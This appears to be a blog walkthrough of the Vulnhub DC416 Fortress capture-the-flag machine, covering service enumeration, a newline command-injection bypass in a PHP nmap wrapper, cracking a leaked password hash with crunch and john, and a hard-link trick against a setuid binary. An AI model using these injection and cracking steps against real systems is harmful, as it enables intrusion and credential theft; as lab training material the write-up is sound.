Vulnhub – DC416 Fortress Walkthrough

This is my first write-up on Vulnhub – DC416 Fortress challenge. We start by enumerating services. but before that we have to find out the IP Address of our machine.

Information Gathering

netdiscover will scan all active devices on our network. (Our Target is: 192.168.1.6)

Now, that we know our target IP Address let’s find out which services are running. Nmap scan suggests that server is running FreeBSD and have few services running.

If we take a look at port 80 we have Apache server running so let’s take a look.

There’s nothing on that page i through to curl it to make sure there’s nothing hidden inside but no luck.

Now, it’s time for my favorite part directory enumeration. 🙂

So for that we have some awesome tools installed already in Kali Linux but my favorite is dirb and dirbuster. We had not luck because we couldn’t find any directory so let’s try searching for files. We know server is running Apache so why not give it a try to search for .php extensions.

dirb https://192.168.1.6 /usr/share/dirb/wordlists/big.txt

let’s do it!

dirb https://192.168.1.6 /usr/share/dirb/wordlists/big.txt -X .php

And we found our first lead scanner.php file. (https://192.168.1.6/scanner.php) 🙂 let’s take a look.

So we have something here. let’s try to find out what is it?

We have a input field where we enter an IP and it runs Nmap command. Good! 🙂 Maybe we can try command injection here, so let’s take a look at it’s response through Burp.

Read About Command Injection Here: https://www.owasp.org/index.php/Command_Injection

So, we did try command injection looks like there’s some kind of filtration.

POST /scanner.php HTTP/1.1
Host: 192.168.1.6
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.6/scanner.php
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 17

host=127.0.0.1;ls

HTTP/1.1 200 OK
Date: Thu, 08 Mar 2018 23:53:45 GMT
Server: Apache/2.4.23 (FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27
X-Powered-By: PHP/5.6.27
Content-Length: 472
Connection: close
Content-Type: text/html; charset=UTF-8

<html>
<head>
<title>S C A N N 3 R</title>
<link rel="stylesheet" href="styles.css" type="text/css" />
</head>
<body>

<div class="container">

<form method="POST" action="">
  <input class="form" type="text" name="host" value="127.0.0.1" />
  <input class="button" type="submit" value="Scan Target" />
</form>
<pre>Command: /usr/local/bin/nmap -F -sT 127.0.0.1;ls

</pre><pre>Nope. Good try though... 💋</pre>

<img class="logo" src="logo.png">

</div>
</body>
</html>

So, this didn’t worked!

host=127.0.0.1;ls

let’s try again!

host=127.0.0.1
ls

Awesome!

Now after doing ls -la we found these directories.

• k1ngd0m_k3yz
• s1kr3t

These two directories looks strange let’s have a look.

total 144
drwxr-xr-x  4 root  wheel    512 Nov  9  2016 .
drwxr-xr-x  6 root  wheel    512 Nov  9  2016 ..
-rw-r--r--  1 root  wheel    561 Nov  8  2016 index.html
drwxr-xr-x  2 root  wheel    512 Nov  9  2016 k1ngd0m_k3yz
-rw-r--r--  1 root  wheel  44867 Nov  4  2016 logo.png
drwxr-xr-x  2 root  wheel    512 Nov  9  2016 s1kr3t
-rw-r--r--  1 root  wheel    759 Nov  5  2016 scanner.php
-rw-r--r--  1 root  wheel    612 Nov  4  2016 styles.css

• k1ngd0m_k3yz

-rw-r--r--  1 root  wheel  157 Nov  9  2016 master
-rw-r--r--  1 root  wheel   47 Nov  9  2016 passwd

• s1kr3t

-rw-r--r--  1 root  wheel   31 Nov  4  2016 flag.txt

Now, let’s take a look inside master and passwd files.

Inside master file we have our hash. Save that to hash.txt just in case we couldn’t get any further lead.

craven:$6$qAgPM2TEordSoFnH$4uPUAhB.9rORkWExA8jI0Sbwn0Bj50KAK0tJ4rkrUrIkP6v.gE/6Fw9/yn1Ejl2TedyN5ziUz8N0unsHocuks.:1002:1002::0:0:User &:/home/craven:/bin/sh

Inside passwd file.

craven:*:1002:1002:User &:/home/craven:/bin/sh

flag1

The first flag can be found in the s1kr3t directory.

cat s1kr3t/flag.txt
FLAG{n0_one_br3aches_teh_f0rt}

Finally, we have found our first flag.

---

From our previous findings  we have found that there’s a user account named craven.

ls -la /home/craven/

-r--------  1 craven  craven    46 Nov  6  2016 flag.txt
-rw-r--r--  1 craven  craven   119 Nov  5  2016 hint.txt
-rw-r--r--  1 craven  craven    77 Nov  5  2016 reminders.txt

Look’s like we have found our second flag inside /home/craven/ directory.

We do not have read permission for flag.txt and now let’s take a look at hint.txt and reminders.txt files.

hint.txt

Keep forgetting my password, so I made myself a hint. Password is three digits followed by my
pet's name and a symbol.

reminders.txt

To buy:
* skim milk
* organic free-run eggs
* dog bone for qwerty
* sriracha

Now, that we have a hint and hint suggests that his dog name is: qwerty we’re gonna add three digits before qwerty and one symbol after and that can be done through crunch wordlist generator.

• Qwerty
• 3 digits
• Symbol

crunch 10 10 -t %%%qwerty^ > pass.txt

This command will create every possible word.

Now, we have to crack hash.txt hash that we found earlier.

john -wordlist=pass.txt hash.txt

It seems that we have successfully cracked our password. 🙂

931qwerty?

Boom!

Now we’re able to get our second flag.

$ pwd
/usr/home/craven
$ ls
flag.txt	hint.txt	reminders.txt
$ cat flag.txt 
FLAG{w0uld_u_lik3_som3_b33r_with_ur_r3d_PiLL}

flag2

FLAG{w0uld_u_lik3_som3_b33r_with_ur_r3d_PiLL}

---

It’s time to get our third flag.

I did cd /home and found another user name: vulnhub. We can spot a suid binary from the user vulnhub in it’s home directory /home/vulnhub.

$ ls
craven	vulnhub
$ pwd
/usr/home

Inside vulnhub directory we have our third flag and reader file.

$ ls
flag.txt	reader

By doing file reader we have some info about reader file.

reader: setuid ELF 64-bit LSB executable, x86-64, version 1 (FreeBSD), dynamically linked, interpreter /libexec/ld-elf.so.1, for FreeBSD 11.0 (1100122), FreeBSD-style, not stripped

Since we can execute reader file as carven user we can read our third flag let’s try. 🙂

It seems the binary checks the filename for flag.txt so let’s try to trick this check with a symbolic link:

Now to a hard link. (https://www.computerhope.com/unix/uln.htm)

Boom! 🙂

flags3

FLAG{its_A_ph0t0_ph1ni5h}